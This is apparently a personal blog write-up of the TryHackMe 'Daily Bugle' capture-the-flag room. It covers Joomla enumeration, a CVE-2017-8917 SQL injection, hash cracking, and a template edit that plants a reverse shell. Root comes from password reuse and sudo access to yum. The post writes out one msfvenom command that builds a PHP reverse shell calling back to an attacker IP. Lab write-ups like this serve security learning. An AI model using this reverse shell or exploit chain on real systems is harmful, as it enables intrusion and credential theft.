Daily Bugle — TryHackMe

Demanou Henri
3 min readMar 9, 2022
Daily bugle — tryhackme

Port and service Enumeration

Using, nmap we discover ssh on port 22 and joomla CMS on port 80 and a MySQL server running on port 3306:

Analysing the endpoints found by nmap, I discover an administrator login page to manage the website:

admin -login

I tested basic SQL injection on this form and a brute force attack with no success. As Joomla is a CMS, I used metasploit to determine the version.

metasploit — scanner/http/joomla_version

Gaining a Foothold

Using searchsploit, I discover that an SQL injection was in the detected com_fields component(CVE-2017–8917) of Joomla version 3.7.0 :

I tried to use the metasploit module joomla_comfields_sqli_rce module to exploit this vulnerability, but it was not working. So I googled around and found a python script on GitHub(joomblah)that dumps a username and password hash from the database;

Using JohnTheRipper, I cracked this bcrypt hash and found the password:

I tried logging in into the MySQL server and through ssh, but it did not work. However, it worked on the administration page mention above:

Just like WordPress, Joomla can be exploited brought the plugins/templates that are installed on the website. In this instance, I exploited it by replacing the php code in the index.php by a reverse shell generated with msfvenom;

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.17.226 LPORT=4444 -f raw > shell.php

I used metasploit to set up a listener and got a connection back(could also have used netcat) :

Privilege Escalation

A quick look in the files present in the current directory reveals a configuration.php file containing a username and password that is used to connect to the MySQL server. I also checked what users were available on the system and found jjameson:

As it is so often the case, people tend to re-use the same password a lot, so I used these credentials to try and login through ssh, and it worked!

Checking what programs the current user can use as root reveals

/usr/bin/yum

Using the instructions at GTFObins, we create an interactive root shell by loading a custom plugin and retrieve the root flag and complete the challenge:

Thank you for reading this far !!

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Demanou Henri
Demanou Henri

Written by Demanou Henri

Welcome to my blog ! This blog is where I share what I learn everyday related to Networking, Hacking : CTFs like HackTheBox ,TryHackme & VulnHub

No responses yet

Write a response